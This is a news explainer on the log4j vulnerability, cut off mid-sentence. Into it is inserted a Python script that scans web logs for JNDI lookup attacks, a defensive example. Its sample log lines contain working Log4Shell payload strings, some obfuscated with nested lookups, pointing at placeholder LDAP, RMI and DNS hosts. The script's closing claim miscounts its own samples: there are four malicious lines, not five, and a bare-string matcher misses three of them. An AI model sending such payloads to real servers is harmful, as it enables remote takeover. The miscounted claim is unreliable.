On Dec. 9, word of a newly discovered computer bug in a hugely popular piece of computer code started rippling around the cybersecurity community. By the next day, nearly every major software company was in crisis mode, trying to figure out how their products were affected and how they could patch the hole.
The language security experts have used to describe the new vulnerability in log4j, an extremely common piece of code, borders on the apocalyptic.
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career,” Cybersecurity and Infrastructure Security Agency Director Jen Easterly said in a Thursday interview on CNBC.
So why is this obscure piece of software causing so much panic, and should regular computer users be worried?
What is Log4j and where did it come from?
Log4j is a free, open-source logging library for programs written in Java, maintained by the Apache Software Foundation, that helps software applications keep a record of what they have done. Instead of reinventing a “logging” – or record-keeping – component each time developers build new software, they often use existing code like log4j instead. It is free to download and very widely used, appearing in a “big chunk” of Internet services, according to Asaf Ashkenazi, chief operating officer of security company Verimatrix.
Each time log4j is asked to log something new, it tries to make sense of that new entry before adding it to the record. A few weeks ago, the cybersecurity community realized that this “making sense” goes further than copying text: if the entry contains a specially formatted lookup string, log4j resolves it, and one kind of lookup can point at a server the attacker controls, from which the program fetches and runs code. So simply getting a vulnerable program to log a short string crafted by an attacker is enough to let bad actors grab control of servers that are running log4j.
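The practical consequence for defenders is that the attack shows up in their own logs first: the crafted string arrives in a request header, a username or a search box, and a vulnerable server writes it to disk before it does anything else. The following is an added example, not code from the article or from the Log4j project, of the kind of check a defender runs over web-server access logs. It assumes the lookup takes the Log4j 2 form `${jndi:<scheme>:...}` and that attackers disguise it with URL encoding and nested lookups such as `${lower:j}` and `${::-j}`; the log lines and the 203.0.113.x addresses are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (made up for this example; the
# 203.0.113.0/24 addresses are documentation-reserved, not real hosts).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://203.0.113.8/b}"',
    '10.0.0.8 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fc%7D HTTP/1.1" 404 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.10/d}"',
    '10.0.0.10 - - "GET /price?total=$100&d=${date:yyyy} HTTP/1.1" 200 "-"',
]

# Two nested-lookup tricks used to hide the literal text "jndi" (assumed here
# as the obfuscations worth normalizing):
#   ${lower:J} / ${upper:j}  -> case-conversion lookups that resolve to one letter
#   ${::-j} / ${env:NOPE:-j} -> lookups whose ":-default" branch resolves to one letter
# Each pattern only matches an innermost ${...} (no nested braces), so repeated
# substitution peels the layers from the inside out.
INNER_LOOKUPS = [
    re.compile(r'\$\{(?:lower|upper):([^{}$]*)\}', re.IGNORECASE),
    re.compile(r'\$\{[^{}$]*:-([^{}$]*)\}'),
]

# What we actually want to surface: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and collapse nested lookups until nothing changes."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        for pattern in INNER_LOOKUPS:
            text = pattern.sub(r'\1', text)
        if text == before:
            break
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, normalized_snippet) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines):
        cleaned = normalize(line)
        match = JNDI_LOOKUP.search(cleaned)
        if match:
            snippet = cleaned[match.start():match.start() + 40]
            hits.append((number, match.group(1).lower(), snippet))
    return hits


if __name__ == "__main__":
    for number, scheme, snippet in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme}: {snippet}")
```

A hit means someone tried, not that they succeeded; the scheme (ldap, rmi, dns) and the host in the snippet tell you where a vulnerable server would have connected, which is what to look for in outbound-connection logs next. Normalizing before matching matters more than the pattern itself: a detector that looks for the bare text `${jndi:` misses four of the five malicious lines above.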
Reports differ when it comes to who first raised the alarm about the vulnerability. Some people say it surfaced in a forum dedicated to the video game Minecraft. Others point to a security researcher at Chinese tech company Alibaba. But experts say it’s the biggest software vulnerability of all time in terms of the number of services, sites and devices exposed.
Software bugs crop up all the time. Why is this one different?
The fact that log4j is such a ubiquitous piece of software is what makes this such a big deal. Imagine if a common type of lock used by…